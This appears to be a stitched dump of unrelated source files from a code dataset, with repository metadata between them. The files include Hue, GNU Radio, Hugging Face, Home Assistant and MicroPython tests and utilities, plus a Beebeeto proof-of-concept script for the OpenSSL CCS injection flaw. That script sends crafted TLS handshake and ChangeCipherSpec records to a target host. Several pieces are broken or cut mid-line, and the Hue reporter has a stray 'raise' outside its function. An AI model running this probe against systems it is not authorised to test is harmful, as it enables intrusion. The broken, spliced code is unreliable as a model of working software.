"""Pick a cell (possibly ourselves) to build new instance(s)
and forward the request accordingly.
"""
# Target is ourselves first.
our_cell = self.state_manager.get_my_state()
self.msg_runner.schedule_run_instance(ctxt, our_cell,
host_sched_kwargs)
def run_compute_api_method(self, ctxt, cell_name, method_info, call):
"""Call a compute API method in a specific cell."""
response = self.msg_runner.run_compute_api_method(ctxt,
cell_name,
method_info,
call)
if call:
return response.value_or_raise()
def instance_update_at_top(self, ctxt, instance):
"""Update an instance at the top level cell."""
self.msg_runner.instance_update_at_top(ctxt, instance)
def instance_destroy_at_top(self, ctxt, instance):
""
|
sanjeevtripurari/hue
|
desktop/core/src/desktop/lib/metrics/file_reporter.py
|
Python
|
apache-2.0
| 2,100
| 0.007619
|
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import os
import tempfile
import threading
from pyformance.reporters.reporter import Reporter
from desktop.lib.metrics import global_registry
LOG = logging.getLogger(__name__)
class FileReporter(Reporter):
    """Dumps the metrics registry as JSON to a file on each reporting cycle.

    Metrics are written to a temporary file in the target directory and then
    atomically renamed into place, so readers never observe a partial file.
    """

    def __init__(self, location, *args, **kwargs):
        super(FileReporter, self).__init__(*args, **kwargs)

        # Destination path for the JSON metrics dump.
        self.location = location

    def report_now(self, registry=None, timestamp=None):
        dirname = os.path.dirname(self.location)
        try:
            os.makedirs(dirname)
        except OSError:
            # Directory already exists (or was created concurrently).
            pass

        # Write the metrics to a temporary file, then atomically
        # rename the file to the real location.
        # BUG FIX: open in text mode -- NamedTemporaryFile defaults to
        # 'w+b', but json.dump() writes str, which fails on a binary-mode
        # file under Python 3.
        f = tempfile.NamedTemporaryFile(
            mode='w',
            dir=dirname,
            delete=False)

        try:
            json.dump(self.registry.dump_metrics(), f)
            f.close()

            os.rename(f.name, self.location)
        except Exception:
            # BUG FIX: close the handle before unlinking (required on
            # Windows) so the stale temp file can actually be removed.
            f.close()
            os.remove(f.name)
            raise
raise
# Module-level singleton so the reporter is started at most once per process.
_reporter = None


def start_file_reporter():
    """Start the global FileReporter if metrics reporting is configured.

    Reads the dump location and collection interval from desktop
    configuration; does nothing when either is unset or when a reporter is
    already running. (Repaired: two statements were split by corruption in
    the source.)
    """
    from desktop.conf import METRICS

    global _reporter

    if _reporter is None:
        location = METRICS.LOCATION.get()
        interval = METRICS.COLLECTION_INTERVAL.get()

        if location is not None and interval is not None:
            # The configured interval is divided by 1000, i.e. it is given
            # in milliseconds while the reporter expects seconds.
            _reporter = FileReporter(
                location,
                reporting_interval=interval / 1000.0,
                registry=global_registry())
            _reporter.start()
|
mrjacobagilbert/gnuradio
|
gr-vocoder/python/vocoder/qa_g723_24_vocoder.py
|
Python
|
gpl-3.0
| 858
| 0
|
#!/usr/bin/env python
#
# Copyright 2011,2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
#
from gnuradio import gr, gr_unittest, vocoder, blocks
class test_g723_24_vocoder (gr_unittest.TestCase):
    """QA: round-trip samples through the G.723-24 encoder/decoder pair.

    (Repaired: the vector_source_s call was split by corruption in the
    source.)
    """

    def setUp(self):
        self.tb = gr.top_block()

    def tearDown(self):
        self.tb = None

    def test001_module_load(self):
        # Sample values expected to survive the lossy encode/decode round
        # trip unchanged (asserted below).
        data = (0, 16, 36, 40, 68, 104, 148, 220, 320, 512)
        src = blocks.vector_source_s(data)
        enc = vocoder.g723_24_encode_sb()
        dec = vocoder.g723_24_decode_bs()
        snk = blocks.vector_sink_s()
        self.tb.connect(src, enc, dec, snk)
        self.tb.run()
        actual_result = snk.data()
        self.assertEqual(list(data), actual_result)
if __name__ == '__main__':
    # Run this QA suite under GNU Radio's unittest wrapper.
    gr_unittest.run(test_g723_24_vocoder)
|
forbidden-ali/Beebeeto-framework
|
demo/openssl_man_in_middle.py
|
Python
|
gpl-2.0
| 9,009
| 0.002612
|
#!/usr/bin/env python
# coding=utf-8
"""
Site: http://www.beebeeto.com/
Framework: https://github.com/n0tr00t/Beebeeto-framework
"""
import time
import struct
import random
import socket
import select
import urlparse
from baseframe import BaseFrame
from utils.common.str import hex_dump
class MyPoc(BaseFrame):
poc_info = {
# poc相关信息
'poc': {
'id': 'poc-2014-0014', # 由Beebeeto官方编辑
'name': None, # 名称
'author': 'anonymous', # 作者
'create_date': '2014-07-16', # 编写日期
},
# 协议相关信息
'protocol': {
'name': 'ssl/tls', # 该漏洞所涉及的协议名称
'port': [443], # 该协议常用的端口号,需为int类型
'layer3_protocol': ['tcp'], # 该协议基于哪个传输层协议(tcp/udp/sctp)
},
# 漏洞相关信息
'vul': {
'app_name': 'openssl', # 漏洞所涉及的应用名称
'vul_version': ['<0.9.8y', # 受漏洞影响的应用版本
['1.0.0', '1.0.0l'],
['1.0.0', '1.0.0g']],
'type': None, # 漏洞类型
'tag': ['openssl', 'man in middle'], # 漏洞相关Tag
'desc': '''
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not
properly restrict processing of ChangeCipherSpec messages,which allows man-in-the-middle
attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL
communications, and consequently hijack sessions or obtain sensitive information,
via a crafted TLS handshake, aka the "CCS Injection" vulnerability.
''', # 漏洞描述
'references': ['https://portal.nsfocus.com/vulnerability/list/',
'http://ccsinjection.lepidum.co.jp/blog/2014-06-05/CCS-Injection-en/index.html',
'https://gist.github.com/rcvalle/71f4b027d61a78c42607',
], # 参考链接
},
}
def _init_user_parser(self):
    """Register this module's command line options on the shared option parser."""
    parser = self.user_parser
    parser.add_option(
        '--msgtype', dest='msg_type', action='store', type='int', default=1,
        help='define the 11th bype data of the handshake message. '
             'The optional values are "0", "1", "2" or "3"')
    parser.add_option(
        '-p', '--port', dest='port', action='store', type='int', default=443,
        help='host port.')
handshake_message = "" \
"\x16" \
"\x03\x01" \
"\x00\x9a" \
"\x01" \
"\x00\x00\x
|
96" \
"\x03\x01" \
"\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00" \
"\x00\x68" \
"\xc0\x14" \
"\xc0\x13" \
"\xc0\x12" \
"\xc0\x11" \
"\xc0\x10" \
"\xc0\x0f" \
"\xc0\x0e" \
"\xc0\x0d" \
"\xc0\x0c" \
"\xc0\x0b" \
"\xc0\x0a" \
"\xc0\x09" \
"\xc0\x08" \
"\xc0\x07" \
"\xc0\x06" \
"\xc0\x05" \
"\xc0\x04" \
"\xc0\x03" \
"\xc0\x02" \
"\xc0\x01" \
"\x00\x39" \
"\x00\x38" \
"\x00\x37" \
"\x00\x36" \
"\x00\x35" \
"\x00\x33" \
"\x00\x32" \
"\x00\x31" \
"\x00\x30" \
"\x00\x2f" \
"\x00\x16" \
"\x00\x15" \
"\x00\x14" \
"\x00\x13" \
"\x00\x12" \
"\x00\x11" \
"\x00\x10" \
"\x00\x0f" \
"\x00\x0e" \
"\x00\x0d" \
"\x00\x0c" \
"\x00\x0b" \
"\x00\x0a" \
"\x00\x09" \
"\x00\x08" \
"\x00\x07" \
"\x00\x06" \
"\x00\x05" \
"\x00\x04" \
"\x00\x03" \
"\x00\x02" \
"\x00\x01" \
"\x01" \
"\x00" \
"\x00\x05" \
"\x00\x0f" \
"\x00\x01" \
"\x01"
ccs_message = "" \
"\x14" \
"\x03\x01" \
"\x00\x01" \
"\x01"
@staticmethod
def modify_str(str1, index, value):
    """Return a copy of ``str1`` with the single character at ``index`` replaced by ``value``."""
    head, tail = str1[:index], str1[index + 1:]
    return head + value + tail
@classmethod
def verify(cls, args):
options = args['options']
if options['msg_type'] == 1:
handshake_message = cls.modify_str(cls.handshake_message, 10, '\x02')
elif options['msg_type'] == 2:
handshake_message = cls.modify_str(cls.handshake_message, 10, '\x03')
elif options['msg_type'] == 3:
handshake_message = cls.modify_str(cls.handshake_message, 2, '\x00')
handshake_message = cls.modify_str(handshake_message, 10, '\x00')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
s.settimeout(5)
if options['target'].startswith('https://') or options['target'].startswith('http://'):
host = urlparse.urlparse(options['target']).netloc
else:
host = options['target']
ip = socket.gethostbyname(host)
s.connect((host, options['port']))
if options['verbose']:
print "connected to %s:%d\n\n" % (host, options['port'])
handshake_message = handshake_message[:11] + \
struct.pack('!I', int(time.time())) + \
handshake_message[15:]
for i in xrange(28):
handshake_message = cls.modify_str(handshake_message,
15 + i,
struct.pack("B", random.randint(0, 255) & 0xff))
s.send(handshake_message)
if options['verbose']:
print hex_dump(handshake_message)
print "%d bytes sent\n\n" % len(handshake_message)
rlists = [s]
wlists = []
buf_size = 16384
ccs_sent = 0
while True:
rs, ws, es = select.select(rlists, wlists, rlists, 10)
if not(rs or ws or es):
if options['verbose']:
print '\ntimeout...'
args['poc_ret'] = 'timeout'
args['success'] = False
return args
buf = s.recv(buf_size)
if options['verbose']:
print hex_dump(buf)
print "%d bytes received\n\n" % len(buf)
if ccs_sent:
for i in xrange(len(buf)):
if ( buf[i] == '\x15' and # alert
buf[i + 1] == '\x03' and
buf[i + 5] == '\x02'): # fatal
if (buf[i + 6] == '\x0a'): # unexpected_message
if options['verbose']:
print "%s: Not Vulnerable\n" % host
args['success'] = False
return args
else:
break
break
else:
for i in xrange(len(buf)):
if ( buf[i] == '\x16' and # handshake
buf[i + 1] == '\x03' and
buf[i + 5] == '\x02' and # server_hello
buf[i + 9] == '\x03'):
ccs_message = cls.modify_str(cls.ccs_message, 2, buf[i + 10]) # Use the protocol version sent by the server.
if ( buf[i] == '\x16' and # handshake
buf[i + 1] == '\x03' and
buf[i + 3] == '\x00' and
buf[i + 4] == '\x04' and
buf[i + 5] == '\x0e' and # server_hello_done
buf[i + 6] == '\x00' and
buf[i + 7] == '\x00' and
buf[i + 8] == '\x00'):
# Send the change cipher spec message twice to force
# an alert in the case the server is not patched.
s.send(ccs_message)
if options['verbose']:
print hex_dump(ccs_message)
p
|
huggingface/transformers
|
tests/mobilebert/test_modeling_mobilebert.py
|
Python
|
apache-2.0
| 15,383
| 0.00351
|
# coding=utf-8
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from transformers import MobileBertConfig, is_torch_available
from transformers.models.auto import get_values
from transformers.testing_utils import require_sentencepiece, require_tokenizers, require_torch, slow, torch_device
from ..test_configuration_common import ConfigTester
from ..test_modeling_common import ModelTesterMixin, ids_tensor, random_attention_mask
if is_torch_available():
import torch
from transformers import (
MODEL_FOR_PRETRAINING_MAPPING,
MobileBertForMaskedLM,
MobileBertForMultipleChoice,
MobileBertForNextSentencePrediction,
MobileBertForPreTraining,
MobileBertForQuestionAnswering,
MobileBertForSequenceClassification,
MobileBertForTokenClassification,
MobileBertModel,
)
class MobileBertModelTester:
def __init__(
self,
parent,
batch_size=13,
seq_length=7,
is_training=True,
use_input_mask=True,
use_token_type_ids=True,
use_labels=True,
vocab_size=99,
hidden_size=64,
embedding_size=32,
num_hidden_layers=5,
num_attention_heads=4,
intermediate_size=37,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=512,
type_vocab_size=16,
type_sequence_label_size=2,
initializer_range=0.02,
num_labels=3,
num_choices=4,
scope=None,
):
self.parent = parent
self.batch_size = batch_size
self.seq_length = seq_length
self.is_training = is_training
self.use_input_mask = use_input_mask
self.use_token_type_ids = use_token_type_ids
self.use_labels = use_labels
self.vocab_size = vocab_size
self.hidden_size = hidden_size
self.embedding_size = embedding_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.intermediate_size = intermediate_size
self.hidden_act = hidden_act
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.max_position_embeddings = max_position_embeddings
self.type_vocab_size = type_vocab_size
self.type_sequence_label_size = type_sequence_label_size
self.initializer_range = initializer_range
self.num_labels = num_labels
self.num_choices = num_choices
self.scope = scope
def prepare_config_and_inputs(self):
    """Build a config plus a full set of random inputs, masks and labels."""
    input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)
    input_mask = random_attention_mask([self.batch_size, self.seq_length]) if self.use_input_mask else None
    token_type_ids = (
        ids_tensor([self.batch_size, self.seq_length], self.type_vocab_size) if self.use_token_type_ids else None
    )
    sequence_labels = token_labels = choice_labels = None
    if self.use_labels:
        sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
        token_labels = ids_tensor([self.batch_size, self.seq_length], self.num_labels)
        choice_labels = ids_tensor([self.batch_size], self.num_choices)
    return self.get_config(), input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
def get_config(self):
    """Return a small MobileBertConfig mirroring the tester's hyperparameters."""
    config_kwargs = dict(
        vocab_size=self.vocab_size,
        hidden_size=self.hidden_size,
        num_hidden_layers=self.num_hidden_layers,
        num_attention_heads=self.num_attention_heads,
        intermediate_size=self.intermediate_size,
        embedding_size=self.embedding_size,
        hidden_act=self.hidden_act,
        hidden_dropout_prob=self.hidden_dropout_prob,
        attention_probs_dropout_prob=self.attention_probs_dropout_prob,
        max_position_embeddings=self.max_position_embeddings,
        type_vocab_size=self.type_vocab_size,
        is_decoder=False,
        initializer_range=self.initializer_range,
    )
    return MobileBertConfig(**config_kwargs)
def create_and_check_mobilebert_model(
    self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
):
    """Run the bare model with progressively fewer inputs and check the output shapes."""
    model = MobileBertModel(config=config)
    model.to(torch_device)
    model.eval()
    # The model must accept the full input set as well as the reduced variants.
    result = model(input_ids, attention_mask=input_mask, token_type_ids=token_type_ids)
    result = model(input_ids, token_type_ids=token_type_ids)
    result = model(input_ids)
    expected_hidden = (self.batch_size, self.seq_length, self.hidden_size)
    self.parent.assertEqual(result.last_hidden_state.shape, expected_hidden)
    self.parent.assertEqual(result.pooler_output.shape, (self.batch_size, self.hidden_size))
def create_and_check_mobilebert_for_masked_lm(
    self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
):
    """Check that the masked-LM head emits per-token vocabulary logits."""
    model = MobileBertForMaskedLM(config=config)
    model.to(torch_device)
    model.eval()
    output = model(input_ids, attention_mask=input_mask, token_type_ids=token_type_ids, labels=token_labels)
    self.parent.assertEqual(output.logits.shape, (self.batch_size, self.seq_length, self.vocab_size))
def create_and_check_mobilebert_for_next_sequence_prediction(
    self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
):
    """Check that the next-sentence head emits a binary logit per example."""
    model = MobileBertForNextSentencePrediction(config=config)
    model.to(torch_device)
    model.eval()
    output = model(
        input_ids,
        attention_mask=input_mask,
        token_type_ids=token_type_ids,
        labels=sequence_labels,
    )
    self.parent.assertEqual(output.logits.shape, (self.batch_size, 2))
def create_and_check_mobilebert_for_pretraining(
    self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
):
    """Check the shapes of both pretraining heads (MLM + next-sentence)."""
    model = MobileBertForPreTraining(config=config)
    model.to(torch_device)
    model.eval()
    output = model(
        input_ids,
        attention_mask=input_mask,
        token_type_ids=token_type_ids,
        labels=token_labels,
        next_sentence_label=sequence_labels,
    )
    self.parent.assertEqual(output.prediction_logits.shape, (self.batch_size, self.seq_length, self.vocab_size))
    self.parent.assertEqual(output.seq_relationship_logits.shape, (self.batch_size, 2))
def create_and_check_mobilebert_for_question_answering(
    self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
):
    """Check that the QA head emits per-token start and end logits."""
    model = MobileBertForQuestionAnswering(config=config)
    model.to(torch_device)
    model.eval()
    output = model(
        input_ids,
        attention_mask=input_mask,
        token_type_ids=token_type_ids,
        start_positions=sequence_labels,
        end_positions=sequence_labels,
    )
    per_token = (self.batch_size, self.seq_length)
    self.parent.assertEqual(output.start_logits.shape, per_token)
    self.parent.assertEqual(output.end_logits.shape, per_token)
def create_and_check_mobilebert_for_sequence_classification(
self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
):
config.n
|
Danielhiversen/home-assistant
|
tests/auth/test_auth_store.py
|
Python
|
apache-2.0
| 9,513
| 0.00021
|
"""Tests for the auth store."""
import asyncio
from unittest.mock import patch
from homeassistant.auth import auth_store
async def test_loading_no_group_data_format(hass, hass_storage):
    """Test we correctly load old data without any groups."""
    hass_storage[auth_store.STORAGE_KEY] = {
        "version": 1,
        "data": {
            "credentials": [],
            "users": [
                {
                    "id": "user-id",
                    "is_active": True,
                    "is_owner": True,
                    "name": "Paulus",
                    "system_generated": False,
                },
                {
                    "id": "system-id",
                    "is_active": True,
                    "is_owner": True,
                    "name": "Hass.io",
                    "system_generated": True,
                },
            ],
            "refresh_tokens": [
                {
                    "access_token_expiration": 1800.0,
                    "client_id": "http://localhost:8123/",
                    "created_at": "2018-10-03T13:43:19.774637+00:00",
                    "id": "user-token-id",
                    "jwt_key": "some-key",
                    "last_used_at": "2018-10-03T13:43:19.774712+00:00",
                    "token": "some-token",
                    "user_id": "user-id",
                    "version": "1.2.3",
                },
                {
                    "access_token_expiration": 1800.0,
                    "client_id": None,
                    "created_at": "2018-10-03T13:43:19.774637+00:00",
                    "id": "system-token-id",
                    "jwt_key": "some-key",
                    "last_used_at": "2018-10-03T13:43:19.774712+00:00",
                    "token": "some-token",
                    "user_id": "system-id",
                },
                {
                    "access_token_expiration": 1800.0,
                    "client_id": "http://localhost:8123/",
                    "created_at": "2018-10-03T13:43:19.774637+00:00",
                    "id": "hidden-because-no-jwt-id",
                    "last_used_at": "2018-10-03T13:43:19.774712+00:00",
                    "token": "some-token",
                    "user_id": "user-id",
                },
            ],
        },
    }
    store = auth_store.AuthStore(hass)
    # The three system groups are created even though the stored data has none.
    groups = await store.async_get_groups()
    assert len(groups) == 3
    expected_groups = [
        (auth_store.GROUP_NAME_ADMIN, auth_store.GROUP_ID_ADMIN),
        (auth_store.GROUP_NAME_READ_ONLY, auth_store.GROUP_ID_READ_ONLY),
        (auth_store.GROUP_NAME_USER, auth_store.GROUP_ID_USER),
    ]
    for group, (expected_name, expected_id) in zip(groups, expected_groups):
        assert group.name == expected_name
        assert group.system_generated
        assert group.id == expected_id
    users = await store.async_get_users()
    assert len(users) == 2
    owner, system = users
    assert owner.system_generated is False
    assert owner.groups == [groups[0]]  # migrated into the admin group
    assert len(owner.refresh_tokens) == 1
    owner_token = next(iter(owner.refresh_tokens.values()))
    assert owner_token.id == "user-token-id"
    assert owner_token.version == "1.2.3"
    assert system.system_generated is True
    assert system.groups == []
    assert len(system.refresh_tokens) == 1
    system_token = next(iter(system.refresh_tokens.values()))
    assert system_token.id == "system-token-id"
    assert system_token.version is None
async def test_loading_all_access_group_data_format(hass, hass_storage):
    """Test we correctly load old data with single group."""
    hass_storage[auth_store.STORAGE_KEY] = {
        "version": 1,
        "data": {
            "credentials": [],
            "users": [
                {
                    "id": "user-id",
                    "is_active": True,
                    "is_owner": True,
                    "name": "Paulus",
                    "system_generated": False,
                    "group_ids": ["abcd-all-access"],
                },
                {
                    "id": "system-id",
                    "is_active": True,
                    "is_owner": True,
                    "name": "Hass.io",
                    "system_generated": True,
                },
            ],
            "groups": [{"id": "abcd-all-access", "name": "All Access"}],
            "refresh_tokens": [
                {
                    "access_token_expiration": 1800.0,
                    "client_id": "http://localhost:8123/",
                    "created_at": "2018-10-03T13:43:19.774637+00:00",
                    "id": "user-token-id",
                    "jwt_key": "some-key",
                    "last_used_at": "2018-10-03T13:43:19.774712+00:00",
                    "token": "some-token",
                    "user_id": "user-id",
                    "version": "1.2.3",
                },
                {
                    "access_token_expiration": 1800.0,
                    "client_id": None,
                    "created_at": "2018-10-03T13:43:19.774637+00:00",
                    "id": "system-token-id",
                    "jwt_key": "some-key",
                    "last_used_at": "2018-10-03T13:43:19.774712+00:00",
                    "token": "some-token",
                    "user_id": "system-id",
                    "version": None,
                },
                {
                    "access_token_expiration": 1800.0,
                    "client_id": "http://localhost:8123/",
                    "created_at": "2018-10-03T13:43:19.774637+00:00",
                    "id": "hidden-because-no-jwt-id",
                    "last_used_at": "2018-10-03T13:43:19.774712+00:00",
                    "token": "some-token",
                    "user_id": "user-id",
                },
            ],
        },
    }
    store = auth_store.AuthStore(hass)
    # The legacy "All Access" group is replaced by the three system groups.
    groups = await store.async_get_groups()
    assert len(groups) == 3
    expected_groups = [
        (auth_store.GROUP_NAME_ADMIN, auth_store.GROUP_ID_ADMIN),
        (auth_store.GROUP_NAME_READ_ONLY, auth_store.GROUP_ID_READ_ONLY),
        (auth_store.GROUP_NAME_USER, auth_store.GROUP_ID_USER),
    ]
    for group, (expected_name, expected_id) in zip(groups, expected_groups):
        assert group.name == expected_name
        assert group.system_generated
        assert group.id == expected_id
    users = await store.async_get_users()
    assert len(users) == 2
    owner, system = users
    assert owner.system_generated is False
    assert owner.groups == [groups[0]]  # all-access membership becomes admin
    assert len(owner.refresh_tokens) == 1
    owner_token = next(iter(owner.refresh_tokens.values()))
    assert owner_token.id == "user-token-id"
    assert owner_token.version == "1.2.3"
    assert system.system_generated is True
    assert system.groups == []
    assert len(system.refresh_tokens) == 1
    system_token = next(iter(system.refresh_tokens.values()))
    assert system_token.id == "system-token-id"
    assert system_token.version is None
async def test_loading_empty_data(hass, hass_storage):
    """Test we correctly load with no existing data."""
    store = auth_store.AuthStore(hass)
    groups = await store.async_get_groups()
    assert len(groups) == 3
    # Note the ordering differs from the migration tests: admin, user, read-only.
    expected_groups = [
        (auth_store.GROUP_NAME_ADMIN, auth_store.GROUP_ID_ADMIN),
        (auth_store.GROUP_NAME_USER, auth_store.GROUP_ID_USER),
        (auth_store.GROUP_NAME_READ_ONLY, auth_store.GROUP_ID_READ_ONLY),
    ]
    for group, (expected_name, expected_id) in zip(groups, expected_groups):
        assert group.name == expected_name
        assert group.system_generated
        assert group.id == expected_id
    users = await store.async_get_users()
    assert len(users) == 0
async def test_system_groups_store_id_and_name(hass, hass_s
|
CCBG/django-rolodex
|
rolodex/urls.py
|
Python
|
mit
| 1,436
| 0.009053
|
from django.conf.urls import patterns, url
from ro
|
lodex import views
urlpatterns = [
# Default view if the user have not navigated yet
|
url(r'^$', views.index, name='index'),
# company related urls
url(r'^company/add/$', views.company_add, name='company_add'),
url(r'^company/edit/(?P<company_name>[A-Za-z0-9. \-]+)/$', views.company_edit, name='company_edit'),
url(r'^company/list/$', views.company_list, name='company_list'),
url(r'^company/delete/(?P<company_name>[A-Za-z0-9.\- ]+)/$', views.company_delete, name='company_delete'),
# company related urls
url(r'^contact/add/$', views.contact_add, name='contact_add'),
url(r'^contact/add/(?P<company_name>[A-Za-z0-9.\- ]+)/$', views.contact_add, name='contact_add'),
url(r'^contact/edit/(?P<contact_id>[0-9]+)/$', views.contact_edit, name='contact_edit'),
url(r'^contact/list/$', views.contact_list, name='contact_list'),
url(r'^contact/list/(?P<company_name>[A-Za-z0-9.\- ]+)/$', views.contact_list, name='contact_list'),
url(r'^contact/delete/(?P<contact_id>[0-9]+)/$', views.contact_delete, name='contact_delete'),
url(r'^docs/notes/$', views.doc_notes, name='doc_notes'),
]
|
AriZuu/micropython
|
tests/extmod/uzlib_decompio.py
|
Python
|
mit
| 691
| 0
|
try:
    import uzlib as zlib
    import uio as io
except ImportError:
    # Not running under MicroPython with uzlib/uio available.
    print("SKIP")
    raise SystemExit

# Raw DEFLATE bitstream (no zlib header/trailer); the seek(0, 1) calls report
# how far the decompressor has consumed the underlying stream.
buf = io.BytesIO(b'\xcbH\xcd\xc9\xc9\x07\x00')
inp = zlib.DecompIO(buf, -8)
print(buf.seek(0, 1))
print(inp.read(1))
print(buf.seek(0, 1))
print(inp.read(2))
print(inp.read())
print(buf.seek(0, 1))
print(inp.read(1))
print(inp.read())
print(buf.seek(0, 1))

# zlib-wrapped bitstream with a valid adler32 checksum.
inp = zlib.DecompIO(io.BytesIO(b'x\x9c30\xa0=\x00\x00\xb3q\x12\xc1'))
print(inp.read(10))
print(inp.read())

# Same bitstream with the final checksum byte corrupted: read() must raise.
inp = zlib.DecompIO(io.BytesIO(b'x\x9c30\xa0=\x00\x00\xb3q\x12\xc0'))
try:
    print(inp.read())
except OSError as e:
    print(repr(e))
|
Frenesius/CrawlerProject56
|
crawler/ConfigManager.py
|
Python
|
gpl-3.0
| 4,164
| 0.005764
|
__author__ = 'j'
import ConfigParser
class ParseConfig:
    """Helper around ConfigParser for the crawler's ROW-based config files.

    A config file contains sections named ``ROW1`` .. ``ROW99``.  Every
    option may be overridden per row; otherwise the value from the
    ``DEFAULT`` section applies.  A row takes part in the crawl when its
    ``crawl`` option equals the string ``"1"``.
    """

    # Shared parser instance; successive read() calls accumulate sections.
    config = ConfigParser.ConfigParser()

    def __init__(self):
        pass

    def _get_option(self, row, option):
        """Return ``option`` for section ``ROW<row>``, falling back to DEFAULT."""
        section = "ROW" + str(row)
        if self.config.has_option(section, option):
            return self.config.get(section, option)
        return self.config.get("DEFAULT", option)

    def _crawl_rows(self):
        """Yield the numbers of all loaded ROW sections whose crawl option is "1"."""
        for row in range(1, 100):
            section = "ROW" + str(row)
            if self.config.has_section(section) and self.config.get(section, 'crawl') == "1":
                yield row

    def sumSection(self, filePath):
        '''
        Counts the rows flagged for crawling in the config file.
        :param filePath: path to the config file.
        :return: Int with the amount of crawlable rows in the config file.
        '''
        self.config.read(filePath)
        return sum(1 for _ in self._crawl_rows())

    def getCrawlList(self, filePath):
        '''
        Gives the list back of the sections (table rows) that need to be crawled.
        :param filePath: Path to the config file.
        :return: List with the row numbers.
        '''
        try:
            self.config.read(filePath)
        except ConfigParser.Error:
            # Best effort, matching the original intent: an unreadable or
            # malformed file simply contributes no rows.  (The original
            # bare "except:" executed a no-op string expression here.)
            pass
        return list(self._crawl_rows())

    def getValuexPath(self, int, filePath):
        """Return the value xpath for row ``int``.

        The parameter name ``int`` shadows the builtin but is kept so that
        existing keyword callers continue to work.
        """
        self.config.read(filePath)
        return self._get_option(int, "xpathvalue")

    def getKeyxPath(self, int, filePath):
        """Return the key xpath for row ``int``, falling back to DEFAULT."""
        self.config.read(filePath)
        return self._get_option(int, "xpathkey")

    def getxPathPriceCrawler(self, int, filePath):
        '''
        Gets the xpaths in the config of the price crawler.
        :param int: The row number.
        :param filePath: Path to the config file.
        :return: Dict with the xpaths.
        '''
        self.config.read(filePath)
        # The six lookups all follow the same row-overrides-DEFAULT pattern,
        # so build the dict from a single helper instead of duplicating it.
        options = ('xpathshopname', 'xpathshopscore', 'xpathdelivery',
                   'xpathbareprice', 'xpathshopprice', 'xpathclickout')
        return {option: self._get_option(int, option) for option in options}
|
d0c-s4vage/gramfuzz
|
examples/grams/postal.py
|
Python
|
mit
| 2,381
| 0.009244
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from gramfuzz.fields import *
import names
TOP_CAT = "postal"
# Adapted from https://en.wikipedia.org/wiki/Backus%E2%80%93Naur_form
# The name rules have been modified and placed into names.py
class PDef(Def):
    # Grammar definition in the non-top-level "postal_def" category.
    cat = "postal_def"
class PRef(Ref):
    # Reference that resolves against the "postal_def" category.
    cat = "postal_def"
EOL = "\n"
# this will be the top-most rule
Def("postal_address",
PRef("name-part"), PRef("street-address"), PRef("zip-part"),
cat="postal")
# these will be the grammar rules that should not be randomly generated
# as a top-level rule
PDef("name-part",
Ref("name", cat=names.TOP_CAT), EOL
)
PDef("street-address",
PRef("house-num"), PRef("street-name"), Opt(PRef("apt-num")), EOL,
sep=" ")
PDef("house-num", UInt)
PDef("street-name", Or(
"Sesame Street", "Yellow Brick Road", "Jump Street", "Evergreen Terrace",
"Elm Street", "Baker Street", "Paper Street", "Wisteria Lane",
"Coronation Street", "Rainey Str
|
eet", "Spooner Street",
"0day Causeway", "Diagon Alley",
))
PDef("zip-part",
PRef("town-name"), ", ", PRef("state-code"), " ", PRef("zip-code"), EOL
)
PDef("apt-num",
UInt(min=0, max=10000), Opt(String(charset=String.charset_alpha_upper, min=1, max=2))
)
PDef("town-name", Or(
"Seoul", "São Paulo", "Bombay", "Jakarta", "Karachi", "Moscow",
"Istanbul", "Mexico City", "Shanghai", "Tokyo", "New York", "Bangkok",
"Beijing"
|
, "Delhi", "London", "HongKong", "Cairo", "Tehran", "Bogota",
"Bandung", "Tianjin", "Lima", "Rio de Janeiro" "Lahore", "Bogor",
"Santiago", "St Petersburg", "Shenyang", "Calcutta", "Wuhan", "Sydney",
"Guangzhou", "Singapore", "Madras", "Baghdad", "Pusan", "Los Angeles",
"Yokohama", "Dhaka", "Berlin", "Alexandria", "Bangalore", "Malang",
"Hyderabad", "Chongqing", "Ho Chi Minh City",
))
PDef("state-code", Or(
"AL", "AK", "AS", "AZ", "AR", "CA", "CO", "CT", "DE", "DC", "FL", "GA",
